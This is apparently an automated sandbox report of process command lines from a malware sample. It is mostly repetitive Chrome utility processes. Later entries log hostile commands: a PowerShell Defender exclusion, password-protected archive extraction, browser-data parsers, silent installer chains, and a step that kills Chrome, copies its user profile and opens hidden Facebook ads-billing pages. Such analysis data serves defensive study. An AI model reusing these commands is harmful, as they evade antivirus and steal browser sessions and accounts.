C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3200 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5060 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4092 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4100 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings25⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4292 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4500 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3592 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4236 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4208 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:825⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3836 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5908 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6180 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6576 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6732 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6948 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4024 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7116 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7336 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7408 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7540 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7960 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3696 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7688 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7672 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7676 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8312 /prefetch:825⤵
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg21⤵
- Runs .reg file with regedit
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox21⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome21⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge21⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\axmpholn.gy1\GcleanerWW.exe /mixone & exit18⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exe20⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktq3xiyg.0hj\setup.exe /8-2222 & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\ktq3xiyg.0hj\setup.exeC:\Users\Admin\AppData\Local\Temp\ktq3xiyg.0hj\setup.exe /8-222219⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Morning-Haze"20⤵
-
-
C:\Program Files (x86)\Morning-Haze\7za.exe"C:\Program Files (x86)\Morning-Haze\7za.exe" e -p154.61.71.51 winamp-plugins.7z20⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Morning-Haze\setup.exe" -map "C:\Program Files (x86)\Morning-Haze\WinmonProcessMonitor.sys""20⤵
-
C:\Program Files (x86)\Morning-Haze\setup.exe"C:\Program Files (x86)\Morning-Haze\setup.exe" -map "C:\Program Files (x86)\Morning-Haze\WinmonProcessMonitor.sys"21⤵
-
-
-
C:\Program Files (x86)\Morning-Haze\7za.exe"C:\Program Files (x86)\Morning-Haze\7za.exe" e -p154.61.71.51 winamp.7z20⤵
-
-
C:\Program Files (x86)\Morning-Haze\setup.exe"C:\Program Files (x86)\Morning-Haze\setup.exe" /8-222220⤵
-
C:\Program Files (x86)\Morning-Haze\setup.exe"C:\Program Files (x86)\Morning-Haze\setup.exe" /8-222221⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fathga1m.uk1\MultitimerFour.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\fathga1m.uk1\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\fathga1m.uk1\MultitimerFour.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵
-
C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe" 1 3.1615353975.60485877c85c2 10421⤵
-
C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe" 2 3.1615353975.60485877c85c222⤵
-
C:\Users\Admin\AppData\Local\Temp\xpfnufhj4rn\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xpfnufhj4rn\Setup3310.exe" /Verysilent /subid=57723⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D0L7M.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-D0L7M.tmp\Setup3310.tmp" /SL5="$C04BA,802346,56832,C:\Users\Admin\AppData\Local\Temp\xpfnufhj4rn\Setup3310.exe" /Verysilent /subid=57724⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PP2J2.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PP2J2.tmp\Setup.exe" /Verysilent25⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9QI12.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9QI12.tmp\Setup.tmp" /SL5="$40624,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PP2J2.tmp\Setup.exe" /Verysilent26⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Messure.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T51I8.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-T51I8.tmp\Messure.tmp" /SL5="$1068A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Messure.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AESLL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AESLL.tmp\Setup.exe" /VERYSILENT29⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\PictureLAb.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IL254.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-IL254.tmp\PictureLAb.tmp" /SL5="$2068A,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\PictureLAb.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-E7BK3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E7BK3.tmp\Setup.exe" /VERYSILENT29⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D57K8.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D57K8.tmp\Setup.tmp" /SL5="$503C0,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-E7BK3.tmp\Setup.exe" /VERYSILENT30⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B2KJP.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-B2KJP.tmp\def.exe" /S /UID=lab21431⤵
-
C:\Users\Admin\AppData\Local\Temp\90-4f80f-269-152b2-c3134420abfd8\Lavushakyja.exe"C:\Users\Admin\AppData\Local\Temp\90-4f80f-269-152b2-c3134420abfd8\Lavushakyja.exe"32⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tegxk05x.bt4\md7_7dfj.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\tegxk05x.bt4\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\tegxk05x.bt4\md7_7dfj.exe34⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gow3iwak.ts4\askinstall18.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\gow3iwak.ts4\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\gow3iwak.ts4\askinstall18.exe34⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/35⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2036⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=2060 /prefetch:836⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1704 /prefetch:836⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1656 /prefetch:236⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:136⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:136⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:136⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:136⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:136⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:136⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xdqhkhic.gj1\customer4.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\xdqhkhic.gj1\customer4.exeC:\Users\Admin\AppData\Local\Temp\xdqhkhic.gj1\customer4.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"35⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrwpj5ut.qit\GcleanerWW.exe /mixone & exit33⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exe & exit33⤵
-
